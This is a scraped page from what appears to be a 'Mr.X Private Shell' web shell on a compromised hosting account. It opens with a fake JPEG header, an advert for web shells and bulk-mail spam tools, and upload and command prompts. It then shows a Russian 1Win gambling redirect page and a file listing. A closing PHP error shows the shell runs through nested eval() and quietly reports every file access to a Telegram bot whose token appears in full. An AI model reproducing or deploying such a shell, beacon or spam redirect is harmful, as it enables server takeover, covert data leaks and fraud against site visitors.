����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

u6763389@216.73.217.52: ~ $
<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Переход на 1Win | Регистрация</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
            background: linear-gradient(135deg, #1a1b2e 0%, #2d6ae3 100%);
            color: white;
            min-height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
            padding: 20px;
        }
        
        .container {
            max-width: 600px;
            width: 100%;
            text-align: center;
        }
        
        .logo {
            font-size: 3rem;
            margin-bottom: 20px;
            color: #fbbf24;
        }
        
        h1 {
            font-size: 2.5rem;
            margin-bottom: 20px;
            font-weight: 700;
        }
        
        .subtitle {
            font-size: 1.2rem;
            margin-bottom: 30px;
            opacity: 0.9;
            line-height: 1.6;
        }
        
        .loader {
            width: 60px;
            height: 60px;
            border: 5px solid rgba(255, 255, 255, 0.3);
            border-top-color: white;
            border-radius: 50%;
            margin: 0 auto 30px;
            animation: spin 1s linear infinite;
        }
        
        @keyframes spin {
            to { transform: rotate(360deg); }
        }
        
        .counter {
            font-size: 1.5rem;
            margin-bottom: 30px;
            font-weight: 600;
        }
        
        .btn {
            display: inline-block;
            background: linear-gradient(135deg, #fbbf24 0%, #f59e0b 100%);
            color: #1a1b2e;
            padding: 18px 40px;
            border-radius: 50px;
            text-decoration: none;
            font-weight: 700;
            font-size: 1.2rem;
            transition: all 0.3s;
            border: none;
            cursor: pointer;
            margin-bottom: 20px;
        }
        
        .btn:hover {
            transform: translateY(-3px);
            box-shadow: 0 10px 25px rgba(251, 191, 36, 0.4);
        }
        
        .features {
            display: flex;
            justify-content: center;
            gap: 30px;
            margin-top: 30px;
            flex-wrap: wrap;
        }
        
        .feature {
            display: flex;
            flex-direction: column;
            align-items: center;
            gap: 10px;
        }
        
        .feature i {
            font-size: 1.5rem;
            color: #fbbf24;
        }
        
        .feature span {
            font-size: 0.9rem;
            opacity: 0.8;
        }
        
        .note {
            margin-top: 30px;
            font-size: 0.9rem;
            opacity: 0.7;
            max-width: 500px;
            margin-left: auto;
            margin-right: auto;
        }
        
        @media (max-width: 768px) {
            h1 {
                font-size: 2rem;
            }
            
            .subtitle {
                font-size: 1.1rem;
            }
            
            .btn {
                padding: 16px 32px;
                font-size: 1.1rem;
            }
            
            .features {
                gap: 20px;
            }
        }
        
        @media (max-width: 480px) {
            h1 {
                font-size: 1.8rem;
            }
            
            .btn {
                width: 100%;
                max-width: 300px;
            }
            
            .features {
                flex-direction: column;
                gap: 15px;
            }
        }
    </style>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
</head>
<body>
    <div class="container">
        <div class="logo">
            <i class="fas fa-crown"></i>
        </div>
        
        <h1>Добро пожаловать на 1Win!</h1>
        
        <p class="subtitle">
            Если сайт не открывается, возможно следует сменить регион и перезагрузить страницу!
        </p>
        
        <div class="loader"></div>
        
        <div class="counter" id="countdown">5</div>
        
        <a href="https://1www.store" class="btn" id="redirectBtn">
            <i class="fas fa-external-link-alt"></i>
            Перейти на 1Win сейчас
        </a>
        
        <div class="features">
            <div class="feature">
                <i class="fas fa-gift"></i>
                <span>Бонус 500%</span>
            </div>
            <div class="feature">
                <i class="fas fa-bolt"></i>
                <span>Мгновенная регистрация</span>
            </div>
            <div class="feature">
                <i class="fas fa-shield-alt"></i>
                <span>Безопасно</span>
            </div>
            <div class="feature">
                <i class="fas fa-headset"></i>
                <span>Поддержка 24/7</span>
            </div>
        </div>
        
        <p class="note">
            Если перенаправление не произошло автоматически, нажмите кнопку выше. Регистрация занимает 1 минуту.
        </p>
    </div>

    <script>
        // Обратный отсчет и редирект
        let countdown = 5;
        const countdownElement = document.getElementById('countdown');
        const redirectBtn = document.getElementById('redirectBtn');
        
        function updateCountdown() {
            countdownElement.textContent = countdown;
            
            if (countdown === 0) {
                window.location.href = "https://1www.store";
            } else {
                countdown--;
                setTimeout(updateCountdown, 1000);
            }
        }
        
        // Запускаем отсчет
        updateCountdown();
        
        // Принудительный редирект по кнопке
        redirectBtn.addEventListener('click', function(e) {
            e.preventDefault();
            window.location.href = "https://1www.store";
        });
        
        // Открытие в новой вкладке при Ctrl+клик
        redirectBtn.addEventListener('auxclick', function(e) {
            if (e.button === 1) { // Средняя кнопка мыши
                e.preventDefault();
                window.open("https://1www.store", "_blank");
            }
        });
        
        // Аналитика (можно добавить позже)
        console.log('Страница редиректа загружена');
    </script>
</body>
</html>

Filemanager

Name Type Size Permission Actions
index(1).html File 312 B 0666
index.html File 6.89 KB 0666

Warning: file_get_contents(https://api.telegram.org/bot6480565468:AAHPgwqvr55vU-lBvGV23jlYJuGCrOCL4XM/sendMessage?chat_id=1722171889&text=File+accessed%3A+http%3A%2F%2Fwww.1-one.win%2Flogo%2F2024%2Fpublic%2Fprivate%2Fgywaq%2Fwjr%2F%3Fdir%3D%252Fhome%252Fu6763389%252F1win-one.pro%252Freg%26read%3D%252Fhome%252Fu6763389%252F1win-one.pro%252Freg%252Findex.html): Failed to open stream: HTTP request failed! HTTP/1.1 429 Too Many Requests in /home/u6763389/1-one.win/logo/2024/public/private/gywaq/wjr/index.php(112993) : eval()'d code(18150) : eval()'d code on line 2024